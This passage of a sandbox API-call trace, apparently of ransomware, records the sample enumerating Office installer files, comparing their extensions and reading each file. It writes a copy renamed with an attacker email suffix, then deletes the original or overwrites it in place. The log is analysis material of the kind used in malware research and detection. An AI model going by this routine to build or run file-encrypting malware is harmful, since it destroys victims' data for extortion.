4 [0042.312] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.312] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.312] lstrlenW (lpString=".jpg") returned 4 [0042.312] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.312] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.312] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.312] lstrlenW (lpString=".doc") returned 4 [0042.312] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.312] lstrlenW (lpString=".docx") returned 5 [0042.312] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.312] lstrlenW (lpString=".pdf") returned 4 [0042.312] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.312] lstrlenW (lpString=".xls") returned 4 [0042.312] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.313] lstrlenW (lpString=".xlsx") returned 5 [0042.313] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.313] lstrlenW (lpString=".ppt") returned 4 [0042.313] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.313] lstrlenW (lpString=".zip") returned 4 [0042.313] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.313] lstrlenW (lpString=".rar") returned 4 [0042.313] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.313] lstrlenW (lpString=".bz2") returned 4 [0042.313] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.313] lstrlenW (lpString=".7z") returned 3 [0042.313] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.313] lstrlenW (lpString=".dbf") returned 4 [0042.313] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.313] lstrlenW (lpString=".1cd") returned 4 [0042.313] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.313] lstrlenW (lpString=".jpg") returned 4 [0042.313] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.313] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0042.313] lstrlenW (lpString="Proof.msi") returned 9 [0042.313] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0042.314] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=885760) returned 1 [0042.314] CloseHandle (hObject=0x1d0) returned 1 [0042.314] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi")) returned 0x2020 [0042.314] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.314] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0042.314] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.314] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.314] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0042.314] GetLastError () returned 0x0 [0042.314] ReadFile (in: hFile=0x1d0, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0xd8400, lpOverlapped=0x0) returned 1 [0042.462] WriteFile (in: hFile=0x1b8, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xd8410, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xd8410, lpOverlapped=0x0) returned 1 [0042.947] ReadFile (in: hFile=0x1d0, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0042.947] WriteFile (in: hFile=0x1b8, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.950] SetEndOfFile (hFile=0x1b8) returned 1 [0042.950] CloseHandle (hObject=0x1b8) returned 1 [0042.957] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.957] SetEndOfFile (hFile=0x1d0) returned 1 [0042.964] CloseHandle (hObject=0x1d0) returned 1 [0042.965] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0042.965] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi")) returned 1 [0042.965] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.965] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.965] lstrlenW (lpString=".doc") returned 4 [0042.965] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.965] lstrlenW (lpString=".docx") returned 5 [0042.965] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0042.965] lstrlenW (lpString=".pdf") returned 4 [0042.965] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.965] lstrlenW (lpString=".xls") returned 4 [0042.965] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.965] lstrlenW (lpString=".xlsx") returned 5 [0042.965] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0042.965] lstrlenW (lpString=".ppt") returned 4 [0042.965] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.965] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.965] lstrlenW (lpString=".zip") returned 4 [0042.965] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.965] lstrlenW (lpString=".rar") returned 4 [0042.965] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.966] lstrlenW (lpString=".bz2") returned 4 [0042.966] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.966] lstrlenW (lpString=".7z") returned 3 [0042.966] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.966] lstrlenW (lpString=".dbf") returned 4 [0042.966] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.966] lstrlenW (lpString=".1cd") returned 4 [0042.966] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.966] lstrlenW (lpString=".jpg") returned 4 [0042.966] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.966] lstrlenW (lpString=".doc") returned 4 [0042.966] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.966] lstrlenW (lpString=".docx") returned 5 [0042.966] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0042.966] lstrlenW (lpString=".pdf") returned 4 [0042.966] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.966] lstrlenW (lpString=".xls") returned 4 [0042.966] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.966] lstrlenW (lpString=".xlsx") returned 5 [0042.966] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0042.966] lstrlenW (lpString=".ppt") returned 4 [0042.966] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.966] lstrlenW (lpString=".zip") returned 4 [0042.966] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.966] lstrlenW (lpString=".rar") returned 4 [0042.966] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.966] lstrlenW (lpString=".bz2") returned 4 [0042.966] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.967] lstrlenW (lpString=".7z") returned 3 [0042.967] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.967] lstrlenW (lpString=".dbf") returned 4 [0042.967] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.967] lstrlenW (lpString=".1cd") returned 4 [0042.967] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.967] lstrlenW (lpString=".jpg") returned 4 [0042.967] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.967] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0042.967] lstrlenW (lpString="Proofing.msi") returned 12 [0042.967] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0042.967] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=868864) returned 1 [0042.967] CloseHandle (hObject=0x1d0) returned 1 [0042.967] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi")) returned 0x2020 [0042.967] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.968] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0042.968] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.968] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.968] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0042.968] GetLastError () returned 0x0 [0042.968] ReadFile (in: hFile=0x1d0, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0xd4200, lpOverlapped=0x0) returned 1 [0043.390] WriteFile (in: hFile=0x1b8, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xd4210, lpOverlapped=0x0) returned 1 [0043.409] ReadFile (in: hFile=0x1d0, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0043.409] WriteFile (in: hFile=0x1b8, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.409] SetEndOfFile (hFile=0x1b8) returned 1 [0043.409] CloseHandle (hObject=0x1b8) returned 1 [0043.590] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0043.590] SetEndOfFile (hFile=0x1d0) returned 1 [0044.011] CloseHandle (hObject=0x1d0) returned 1 [0044.012] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0044.014] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi")) returned 1 [0044.019] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0044.022] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0044.023] lstrlenW (lpString=".doc") returned 4 [0044.023] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.023] lstrlenW (lpString=".docx") returned 5 [0044.023] lstrcmpiW (lpString1=".docx", lpString2="g.msi") returned -1 [0044.023] lstrlenW (lpString=".pdf") returned 4 [0044.031] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.031] lstrlenW (lpString=".xls") returned 4 [0044.036] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.036] lstrlenW (lpString=".xlsx") returned 5 [0044.036] lstrcmpiW (lpString1=".xlsx", lpString2="g.msi") returned -1 [0044.036] lstrlenW (lpString=".ppt") returned 4 [0044.036] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.036] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0044.036] lstrlenW (lpString=".zip") returned 4 [0044.036] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.037] lstrlenW (lpString=".rar") returned 4 [0044.059] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.059] lstrlenW (lpString=".bz2") returned 4 [0044.059] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.336] lstrlenW (lpString=".7z") returned 3 [0044.336] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0044.336] lstrlenW (lpString=".dbf") returned 4 [0044.336] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0044.336] lstrlenW (lpString=".1cd") returned 4 [0044.353] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.353] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0044.353] lstrlenW (lpString=".jpg") returned 4 [0044.354] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.354] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0044.354] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0044.354] lstrlenW (lpString=".doc") returned 4 [0044.354] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.355] lstrlenW (lpString=".docx") returned 5 [0044.355] lstrcmpiW (lpString1=".docx", lpString2="g.msi") returned -1 [0044.355] lstrlenW (lpString=".pdf") returned 4 [0044.355] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.355] lstrlenW (lpString=".xls") returned 4 [0044.355] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.355] lstrlenW (lpString=".xlsx") returned 5 [0044.357] lstrcmpiW (lpString1=".xlsx", lpString2="g.msi") returned -1 [0044.357] lstrlenW (lpString=".ppt") returned 4 [0044.357] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.357] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0044.358] lstrlenW (lpString=".zip") returned 4 [0044.358] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.358] lstrlenW (lpString=".rar") returned 4 [0044.358] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.358] lstrlenW (lpString=".bz2") returned 4 [0044.358] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.358] lstrlenW (lpString=".7z") returned 3 [0044.358] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.358] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0044.358] lstrlenW (lpString=".dbf") returned 4 [0044.359] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.359] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0044.359] lstrlenW (lpString=".1cd") returned 4 [0044.359] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.359] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0044.360] lstrlenW (lpString=".jpg") returned 4 [0044.361] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.361] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0044.362] lstrlenW (lpString="OWOW32LR.cab") returned 12 [0044.363] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0044.366] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=2928955) returned 1 [0044.366] CloseHandle (hObject=0x1d0) returned 1 [0044.366] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab")) returned 0x2020 [0044.366] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0044.367] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0044.367] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0044.367] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0044.367] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.367] ReadFile (in: hFile=0x1d0, lpBuffer=0x3bc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3bc0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.424] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xee5be, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.424] ReadFile (in: hFile=0x1d0, lpBuffer=0x3c00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c00058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.432] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.432] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x28b13b, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.432] ReadFile (in: hFile=0x1d0, lpBuffer=0x3c40058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c40058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.455] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.455] WriteFile (in: hFile=0x1d0, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0044.647] SetEndOfFile (hFile=0x1d0) returned 1 [0044.648] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fb70b8 [0044.652] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0044.652] WriteFile (in: hFile=0x1d0, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.653] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xee5be, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0044.653] WriteFile (in: hFile=0x1d0, lpBuffer=0x3fb70b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fb70b8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.659] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x28b13b, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0044.659] WriteFile (in: hFile=0x1d0, lpBuffer=0x3fb70b8*, 